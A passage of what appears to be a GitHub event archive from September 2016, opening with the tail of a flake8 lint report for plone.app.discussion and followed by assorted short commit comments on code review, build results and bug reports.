quotes.\nplone/app/discussion/tests/test_comment.py:329:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:371:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:407:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:442:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:450:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:459:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:468:38: S001 found %s formatter\nplone/app/discussion/tests/test_comments_viewlet.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comments_viewlet.py:43:1: F811 redefinition of unused 'IConversation' from line 38\nplone/app/discussion/tests/test_comments_viewlet.py:112:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:126:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:134:43: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:135:60: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:137:66: W291 trailing whitespace\nplone/app/discussion/tests/test_comments_viewlet.py:180:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:194:59: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:196:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_comments_viewlet.py:236:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:281:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:316:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:405:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:406:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:411:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:416:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:417:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:418:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:429:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:430:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:431:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:487:63: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_contentrules.py:6:1: F401 'notify' imported but unused\nplone/app/discussion/tests/test_contentrules.py:22:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_contentrules.py:51:24: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:52:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:53:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:54:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:59:5: E303 too many blank lines (2)\nplone/app/discussion/tests/test_contentrules.py:117:38: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:121:38: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:122:34: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:123:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:126:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_contentrules.py:135:35: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_contentrules.py:145:44: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_controlpanel.py:36:18: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:43:56: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:92:5: F811 redefinition of unused 'test_edit_comment_enabled' from line 84\nplone/app/discussion/tests/test_controlpanel.py:145:5: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_conversation.py:31:1: B901 blind except: statement\nplone/app/discussion/tests/test_conversation.py:91:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:93:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:94:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:95:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:97:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:518:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:560:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:565:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:570:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:575:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:969:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:973:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:978:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_events.py:15:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:29:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:32:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:35:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:40:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:81:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:99:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:138:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:151:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:157:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_events.py:171:38: S001 found %s formatter\nplone/app/discussion/tests/test_functional.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_indexers.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:54:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:55:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:62:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:63:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:70:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:71:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:110:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:112:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:139:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:140:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_migration.py:55:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:68:14: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:214:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_moderation_view.py:111:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:119:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:127:38: S001 found %s formatter\nplone/app/discussion/tests/test_notifications.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_notifications.py:37:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:64:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:86:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:87:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:102:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:130:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:146:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:151:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:176:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:227:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:228:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:234:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:238:13: S001 found % formatter\nplone/app/discussion/tests/test_tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_tool.py:32:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:42:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:43:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:43:15: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_workflow.py:58:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:94:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_workflow.py:133:38: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:153:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:154:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:203:38: S001 found %s formatter\nplone/app/discussion/browser/captcha.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/captcha.py:64:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comment.py:45:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:45:20: S001 found %s formatter\nplone/app/discussion/browser/comment.py:47:41: S001 found %s formatter\nplone/app/discussion/browser/comment.py:53:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:92:52: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:95:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:95:58: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:108:1: E265 block comment should start with '# '\nplone/app/discussion/browser/comments.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comments.py:94:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:100:35: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:128:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:129:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:130:42: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:132:1: C901 'CommentForm.handleComment' is too complex (15)\nplone/app/discussion/browser/comments.py:141:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:142:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:157:16: E713 test for membership should be 'not in'\nplone/app/discussion/browser/comments.py:210:53: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:251:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:252:22: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:275:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:276:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:325:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:328:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:336:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:344:37: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:415:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:415:21: S001 found %s formatter\nplone/app/discussion/browser/comments.py:462:17: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/controlpanel.py:34:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:90:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:91:48: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:96:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:41: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:113:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:119:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:126:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:128:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:131:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:135:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:141:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:168:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/conversation.py:20:1: B901 blind except: statement\nplone/app/discussion/browser/conversation.py:32:1: C901 'ConversationView._enabled_for_archetypes' is too complex (14)\nplone/app/discussion/browser/conversation.py:138:12: P002 found \"hasattr\", consider replacing it\nplone/app/discussion/browser/conversation.py:138:29: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/migration.py:37:1: C901 'View.__call__' is too complex (32)\nplone/app/discussion/browser/migration.py:44:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:48:16: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:80:26: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:82:31: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:83:22: S001 found %s formatter\nplone/app/discussion/browser/migration.py:181:25: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:181:26: S001 found %s formatter\nplone/app/discussion/browser/migration.py:191:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:191:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:205:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:205:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:206:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:206:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:207:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:207:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:209:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:210:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:228:21: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:229:31: S001 found %s formatter\nplone/app/discussion/browser/migration.py:237:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:238:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:28: S001 found %s formatter\nplone/app/discussion/browser/migration.py:246:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:248:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:249:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:250:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:252:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:253:13: S001 found % formatter\nplone/app/discussion/browser/migration.py:257:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:257:18: S001 found %s formatter\nplone/app/discussion/browser/migration.py:261:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:262:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:266:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:267:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/moderation.py:100:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:101:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:141:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:142:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/traversal.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/traversal.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/traversal.py:32:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/validator.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-20T08:52:35Z"}
{"id":"4588307956","type":"CommitCommentEvent","actor":{"login":"twatteyne"},"repo":{"name":"realms-team/solmanager"},"payload":{"comment":{"id":19092857,"position":null,"line":null,"path":null,"commit_id":"3f1c25c25683a61ba401493bcf397f136055767f","created_at":"2016-09-20T08:52:54Z","updated_at":"2016-09-20T08:52:54Z","body":":-)"}},"created_at":"2016-09-20T08:52:54Z"}
{"id":"4588309952","type":"CommitCommentEvent","actor":{"login":"sangwinc"},"repo":{"name":"maths/moodle-qtype_stack"},"payload":{"comment":{"id":19092861,"position":7,"line":272,"path":"stack/maxima/stackmaxima.mac","commit_id":"d3bae58d040ac4f5d700d324a3e38a558a4c675b","created_at":"2016-09-20T08:53:19Z","updated_at":"2016-09-20T08:53:19Z","body":"Thanks Matti, well spotted.\r\nI think we should keep this check at line 272, and remove it from 469.  \r\nunary_minus_sort is only called here, so this acts as a guard clause and we don't need it in the recursive step.\r\nActually \"freeof\" searches the whole expression so this would be silly to have in a recursive function."}},"created_at":"2016-09-20T08:53:19Z"}
{"id":"4588312035","type":"CommitCommentEvent","actor":{"login":"chbae"},"repo":{"name":"GENIVI/genivi-dev-platform"},"payload":{"comment":{"id":19092877,"position":null,"line":null,"path":null,"commit_id":"52438e329c53083db9c7074ef6c22a252a2d053a","created_at":"2016-09-20T08:53:44Z","updated_at":"2016-09-20T08:53:44Z","body":"Why didn't you merge with meta-genivi-dev layer? and if we have only one commit, it's better to merge by squash merge.\r\n\r\nThanks."}},"created_at":"2016-09-20T08:53:44Z"}
{"id":"4588312709","type":"CommitCommentEvent","actor":{"login":"schubertzhang"},"repo":{"name":"schubertzhang/WeCenter"},"payload":{"comment":{"id":19092879,"position":4,"line":4,"path":"changelog.txt","commit_id":"1e9435ebc12c1765a1252f9b6fd004ca3abbd0af","created_at":"2016-09-20T08:53:52Z","updated_at":"2016-09-20T08:53:52Z","body":"test review"}},"created_at":"2016-09-20T08:53:52Z"}
{"id":"4588313198","type":"CommitCommentEvent","actor":{"login":"schubertzhang"},"repo":{"name":"schubertzhang/WeCenter"},"payload":{"comment":{"id":19092880,"position":4,"line":4,"path":"changelog.txt","commit_id":"1e9435ebc12c1765a1252f9b6fd004ca3abbd0af","created_at":"2016-09-20T08:53:58Z","updated_at":"2016-09-20T08:53:58Z","body":"done"}},"created_at":"2016-09-20T08:53:58Z"}
{"id":"4588315998","type":"CommitCommentEvent","actor":{"login":"afk11"},"repo":{"name":"blocktrail/blocktrail-sdk-nodejs"},"payload":{"comment":{"id":19092886,"position":4,"line":7,"path":".gitignore","commit_id":"f309defe473fd3af502a747b0cf95bc47af90a3a","created_at":"2016-09-20T08:54:31Z","updated_at":"2016-09-20T08:54:31Z","body":"test/run-tests.html ?"}},"created_at":"2016-09-20T08:54:31Z"}
{"id":"4588317119","type":"CommitCommentEvent","actor":{"login":"tmarschen"},"repo":{"name":"pocoproject/poco"},"payload":{"comment":{"id":19092888,"position":null,"line":null,"path":null,"commit_id":"1de98a00c2d7d05dc5dce6a2e409608484e32966","created_at":"2016-09-20T08:54:44Z","updated_at":"2016-09-20T08:54:44Z","body":"Hello arturoc,\r\n\r\nI am using POCO for my project. But I got some compiler error on  poco-1.7.4-release. \r\n\r\nThis is the error info:\r\n\"...\\Foundation\\include\\Poco/Delegate.h\", line 344: Error:  #135: class template \"Poco::Delegate<TObj, void, false>\" has no member \"_pTarget\"\r\n     this->_pTarget        = delegate._pTarget;\r\n           ^\r\n\"...\\Foundation\\include\\Poco/Delegate.h\", line 344: Error:  #135: class template \"Poco::Delegate<TObj, void, false>\" has no member \"_pTarget\"\r\n     this->_pTarget        = delegate._pTarget;\r\n                                      ^\r\n...\\Net\\src\\HTTPServerConnection.cpp: 484 warnings, 2 errors\r\n\r\nIf I remove this line in Delegate.h, it will compile success.\r\nAs I find that you have committed this file on \"add VoidEvent\", So can you please help to check if it is OK?\r\n\r\nIt's highly appreciated if you can help me.\r\n\r\nthanks\r\n\r\nB.R."}},"created_at":"2016-09-20T08:54:44Z"}
{"id":"4588318633","type":"CommitCommentEvent","actor":{"login":"aharjula"},"repo":{"name":"maths/moodle-qtype_stack"},"payload":{"comment":{"id":19092891,"position":7,"line":272,"path":"stack/maxima/stackmaxima.mac","commit_id":"d3bae58d040ac4f5d700d324a3e38a558a4c675b","created_at":"2016-09-20T08:55:03Z","updated_at":"2016-09-20T08:55:03Z","body":"Why not remove it from 322 also?"}},"created_at":"2016-09-20T08:55:03Z"}
{"id":"4588319567","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092895,"position":null,"line":null,"path":null,"commit_id":"10679136205c580ed445a2108532b538b6edfe5f","created_at":"2016-09-20T08:55:14Z","updated_at":"2016-09-20T08:55:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1058](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13593&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T08:55:14Z"}
{"id":"4588320414","type":"CommitCommentEvent","actor":{"login":"JC340301"},"repo":{"name":"JC340301/Assignment2"},"payload":{"comment":{"id":19092898,"position":null,"line":null,"path":null,"commit_id":"488e6d25fc9e8b52e641f843c2fd6730200eb5a9","created_at":"2016-09-20T08:55:23Z","updated_at":"2016-09-20T08:55:23Z","body":"Good job Ismail well done :)"}},"created_at":"2016-09-20T08:55:23Z"}
{"id":"4588333476","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19092923,"position":null,"line":null,"path":null,"commit_id":"1ad4f113a284e77a290e0dfdddf0eb6cc41ac37b","created_at":"2016-09-20T08:58:02Z","updated_at":"2016-09-20T08:58:02Z","body":"@snicolet Just detected a funny thing in the calculation of discovered check candidates!\r\nThis position:\r\n```\r\n +---+---+---+---+---+---+---+---+\r\n | r |   |   |   | k |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   | p | p | q | p |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | B | n |   |   |   | B | p |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | p |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   | r |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   | Q |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P |   |   | P | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R |   |   |   | K |   |   | R |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: r3k3/p1ppqp2/Bn3Bp1/3p4/4r3/5Q1p/PPP2PPP/R3K2R w KQq - 0 15\r\nKey: 5A2D2F26FCB2C174\r\nCheckers: e4   \r\n```\r\nRook on e4 is handled as discovered check candidate although it checks by now!\r\nWhile this might be ok for current SF, it makes my patch buggy because after Qe3\r\nRxe3+ the patch beliefs that it can't strike back with the pawn on f2 :-(\r\n"}},"created_at":"2016-09-20T08:58:02Z"}
{"id":"4588333784","type":"CommitCommentEvent","actor":{"login":"feijian8"},"repo":{"name":"feijian8/rpc"},"payload":{"comment":{"id":19092924,"position":null,"line":null,"path":null,"commit_id":"b6b0c2816f4eee3933668595ef672b5517650379","created_at":"2016-09-20T08:58:06Z","updated_at":"2016-09-20T08:58:06Z","body":"添加自己的学习笔记！"}},"created_at":"2016-09-20T08:58:06Z"}
{"id":"4588339254","type":"CommitCommentEvent","actor":{"login":"RichLogan"},"repo":{"name":"RichLogan/CiscoSpark-UnitySDK"},"payload":{"comment":{"id":19092944,"position":null,"line":null,"path":null,"commit_id":"a7f7e227d33b77d7c6c48ff63839a1552884a18a","created_at":"2016-09-20T08:59:14Z","updated_at":"2016-09-20T08:59:14Z","body":"Also cleaned up the code a bit after reading up on `var` conventions"}},"created_at":"2016-09-20T08:59:14Z"}
{"id":"4588340026","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19092945,"position":13,"line":245,"path":"lib/Adapters/RegressionAdapter/hlsChecksumRegressionValidator.js","commit_id":"1d24670c9569b2507f677dc92ce4f1d89412ae76","created_at":"2016-09-20T08:59:24Z","updated_at":"2016-09-20T08:59:24Z","body":"why are you using Q.fcall?  why not directly call networkClient?\r\n\r\nBTW, if you don't return the promise then validateSingleFlavor will occure while you add more chunks"}},"created_at":"2016-09-20T08:59:24Z"}
{"id":"4588343085","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19092949,"position":28,"line":40,"path":"common/config/configMapping.json","commit_id":"1d24670c9569b2507f677dc92ce4f1d89412ae76","created_at":"2016-09-20T09:00:02Z","updated_at":"2016-09-20T09:00:02Z","body":"why the default is enabled? you will cause the liveController to stop working for regular streams"}},"created_at":"2016-09-20T09:00:02Z"}
{"id":"4588346244","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19092959,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-20T09:00:37Z","updated_at":"2016-09-20T09:00:37Z","body":"![Szeptember 20. - Kedd](http://ujlipot.vakvarju.com/data/napimenu/21.jpg?v=1474276264)\nTyúkhúsleves gazdagon\r\nCsülök pékné módra\r\nZserbószelet"}},"created_at":"2016-09-20T09:00:37Z"}
{"id":"4588352505","type":"CommitCommentEvent","actor":{"login":"whabusan"},"repo":{"name":"whabusan/test"},"payload":{"comment":{"id":19092979,"position":1,"line":1,"path":"test.c","commit_id":"860dd4c32d795f1bdbfddc21d6a736f0bcadf4b2","created_at":"2016-09-20T09:01:52Z","updated_at":"2016-09-20T09:01:52Z","body":"ya"}},"created_at":"2016-09-20T09:01:52Z"}
{"id":"4588363326","type":"CommitCommentEvent","actor":{"login":"mdouchin"},"repo":{"name":"3liz/lizmap-web-client"},"payload":{"comment":{"id":19092997,"position":null,"line":null,"path":null,"commit_id":"8263e1c0c2c4e88452f085d7604760d938226157","created_at":"2016-09-20T09:03:53Z","updated_at":"2016-09-20T09:03:53Z","body":"We could use project name + composer name + date as the name of the exported file ?"}},"created_at":"2016-09-20T09:03:53Z"}
{"id":"4588364853","type":"CommitCommentEvent","actor":{"login":"94MOONJI"},"repo":{"name":"94MOONJI/test"},"payload":{"comment":{"id":19092999,"position":10,"line":8,"path":"test.c","commit_id":"45c3ddb305e47cfa6d0fd1c5d87b433a08436128","created_at":"2016-09-20T09:04:12Z","updated_at":"2016-09-20T09:04:12Z","body":"아 그걸 지우네...."}},"created_at":"2016-09-20T09:04:12Z"}
{"id":"4588365909","type":"CommitCommentEvent","actor":{"login":"dio5"},"repo":{"name":"silverstripe/silverstripe-cms"},"payload":{"comment":{"id":19093001,"position":13,"line":181,"path":"javascript/LeftAndMain_right.js","commit_id":"41aec54e88c2838a862453ad27acbbce075cc3e2","created_at":"2016-09-20T09:04:27Z","updated_at":"2016-09-20T09:04:27Z","body":"This is fixed in later prototype versions apparently by using a regex instead of fixed value check apparently."}},"created_at":"2016-09-20T09:04:27Z"}
{"id":"4588365975","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19093002,"position":null,"line":null,"path":null,"commit_id":"10679136205c580ed445a2108532b538b6edfe5f","created_at":"2016-09-20T09:04:29Z","updated_at":"2016-09-20T09:04:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1058](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13593&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 241, ignored: 3 Build time: 00:09:15"}},"created_at":"2016-09-20T09:04:29Z"}
